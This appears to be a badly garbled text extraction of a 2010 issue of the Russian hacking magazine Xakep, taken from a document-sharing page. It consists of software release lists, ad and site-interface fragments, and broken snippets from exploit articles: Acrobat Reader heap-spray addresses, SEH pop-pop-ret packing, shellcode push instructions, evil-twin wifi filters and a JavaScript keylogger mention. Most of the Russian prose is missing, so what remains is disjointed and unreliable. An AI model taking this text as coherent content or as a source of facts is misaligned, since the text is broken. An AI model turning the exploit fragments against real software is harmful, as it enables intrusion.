Mozilla Thunderbird 3.1
Opera 10.60
qBittorrent 2.2.10
SeaMonkey 2.0.5
Transmission 2.00
Twit Beta
Uget 1.5.9.2
XTelnet 0.4.4
>Games
Wormux 0.9.2
>Devel
Adobe AIR 2.0
Android 2.2
CodeBlocks 10.5
Eclipse 3.6
Geany 0.19
Gnat GPL 2010
Hancock 2.0.2
HSQLDB 2.0
libpng 1.4.3
Meld 1.3.2
MonoDevelop 2.4
MySQL Workbench 5.1.18
NetBeans 6.9
Python 2.7
Paco 2.0.8
Qt Creator 2.0
Ruby Enterprise Edition 1.8.7
Tcl 8.5.8
xTests 0.15.2
ZinjaI 20100624
>Security
AutoIt 3.3.6
BotHunter 1.5.0
EXEForger (SignsImitator) 1.0.40.10
Free Netsparker Community Edition
Hexjector 1.0.7.4
JBroFuzz 2.3
MDD 1.3
PenTBox 1.3.2
Poet 1.0.0
PyLoris 3.0
RainbowCrack 1.41
Sikuli 0.10.1
Snorby Spsa 1.4
Tinc 1.0.13
USBdumper
Wireshark 1.2.9
>Net
Fortitude HTTP 1.0.1.8
Garena
LogMeIn Hamachi
Opera 10.60
Swish 0.4.0
TightVNC 2.0
Trillian 4.2.0
Tunngle 4.3.1.4
VodBurner 1.0.2
Vuze 4.4.0.6a
Weezo 2.1
Flashcards 2.2.5
F-Spot 0.7.0
Furius ISO Mount 0.11.2.1
Gimp 2.6.9
Gnucash 2.2.9
Gramps 3.2.3
Inkscape 0.48
K3b 2.0.0
Kaffeine 1.0
LilyPond 2.13.2
Mathomatic 15.1.4
OpenOffice.org 3.2.1
Pcmanfm 0.9.7
Remind 3.1.9
SimpleBurn 1.5.1
SnowIsh 2
StarDict 3.0.2
VLC 1.1.0
iTunes 9.2
Lotus Symphony 3 Beta
Rainmeter 1.2
Songbird 1.7.3
Zoner Photo Studio Free
>System
EncFS 1.6.0
Linux Kernel 2.6.34
Logstalgia 1.0.0
Pacman 3.4.0
PCSX2 0.9.7 Beta
rdup 1.1.7
SynCE 0.15
Syslinux 3.86
Sysstat 9.1.3
Tracker 0.8.13
VirtualBox 3.2.6
Wine 1.0.1
WineGame 0.1
Zen-kernel 2.6.34
>Server
389 Directory Server 1.2.5
Amavisd-new 2.6.4
Anti-Spam SMTP Proxy Server
1.7.5.5
Apache 2.2.15
BIND 9.7.0
Cherokee 1.0.3
Courier-IMAP 4.8.0
CUPS 1.4.3
DHCP 4.1.1
Dovecot 1.1.12
Mail Avenger 0.8.1
Monkeyd 0.10.3
Music Player Daemon 0.15.9
OpenLDAP 2.4.22
OpenSSH 5.5
OpenVPN 2.1.1
Samba 3.5.4
Simon 0.2
TeamSpeak3
Xorg server 1.8.1
>Security
Agentsmith 0.1
ArpON 2.0
AVG Anti-Virus Free Edition 8.5.0812
Beltane 1.0.17
Ctm 0.2.0
Editor shellcode
John the Ripper 1.7.6
Poet 1.0.0
PyLoris 3.0
Samhain 2.7.1
Simplefuzz 0.6.2
Snare 1.5.1
Snort2Pf 4.4
Spiderpig
Suricata 0.9.2
THC-Hydra 5.7
THC-IPv6 1.2
Tinc 1.0.13
Tmac 1.0
Tor 0.2.1.26
08(139) 2010

WARDIVING
-
MALWARE

08 (139) 2010

: 2
10
.
. 74
VIRUSTOTAL
. 30
NODE.JS
. 50
JAVASCRIPT
UNITS
HTTP:// WWW2

DDoS-
SCREENJELLY
IPINFODB
WWW2
ScreenToaster,
. , 31
. , , , , , Screenjelly. Windows Mac OS X
, .
, IPinfoDB IP-, . ,
, IP.
; ,
.htaccess,

. .
www.screenjelly.com
www.ipinfodb.com
ICONSEARCH
SYNC.IN
,
IconSearch. . , ,
, Google ,
. ,
519 .
133673 . : PNG- , , ,
.
, , - Etherpad, . ,

. Google, , ,
Google Docs Google Wave. ! ,
Etherpad Sync.in.
Create a public note (, sync.in/
mzTvpcoKKA) .
www.iconsearch.ru
144
www.sync.in
X 08 /139/ 10

Хакер 2010 08 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2010 08 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

.

/ .: (495) 935-7034, : (495) 780-8824

/ .: (495) 935-4034, : (495) 780-8824

IPHONE 4, JUST AVOID HOLDING IT IN THAT WAY

:). Motorola FlipOut

FBI VS. TRUECRYPT

Google 20621 , 99%

aod , -: aod = Audio On Demand

<item id="1" title=" ROP"/>

: WINDOWS 7 HOME PREMIUM

: WINDOWS VISTA HOME PREMIUM

, ASRock ION 330-BD ,

: WINDOWS 7 HOME PREMIUM

ViewSonic VOT120 PC Mini . -, ,

SUPERPI MOD 1.5 1M

: ASUS, Acer ASRock

0 500 1000 1500 2000 2500 3000 3500 4000 4500

ASRock ION 330BD, ,

Blu-Ray. ASUS EeeBox PC EB1012, ,

Ftp Server plug-in

Lotus Symphony ChartShare

IBM Lotus Symphony Diff plug-in

Database Connection Plug-in

Mac OS X VT-x. Intel Virtualization Technology for

a(allow)/bssid mac(or 'any')|client mac(or 'any')

d(deny)/bssid mac(or 'any')|client mac(or 'any')

EVIL TWINS V2.0

http_filter.txt , -o http_filter.ef ttercap- ( ).

jskeylogger v1.4 : IP, ID,

if ($host eq "") { usage(); }

} elsif ($type eq "2") {

Acrobat Reader. . SWF- PDF

<---- 0x0C0C0C0C+0x8 = EAX+8 (1)

Acrobat Reader. heap-spray

Windows Help Center. .

echo " ($filename)";

........[DBG: FOUND SYMBOL 'A' - 65]

- Mozilla Firefox TamperData, POST-

rndnum = randseed and 0xFFFFFFFF

fcom st0, st1

, API- Eax, Ecx

push destination - value

push dword 0xb6271100

There is either no index document or the

( :)) . (system call) NtDisplayString

push byte +0x43

push byte +0x2

$SEH = pack ("V",0x013e5423); # pop

pop, pop, ret. , pop'

[OPTION] the best!|

: slil.ru File Uploader

const QString &av,

class QAv : public QObject{

, . PHP! C++ PHP + Ajax ,

Windows. , Windows XP Professional SP3.

KASPERSKY CRYSTAL VS DR.WEB

DR.WEB SECURITY SPACE PRO

(Discretionary Access Control DAC),

LIDS, GRSecurity RSBAC

GRSecurity , MAC/ACL, chroot,

SELinux disable (),

SELinux : setools policycoreutils, policycoreutils-newrole. ,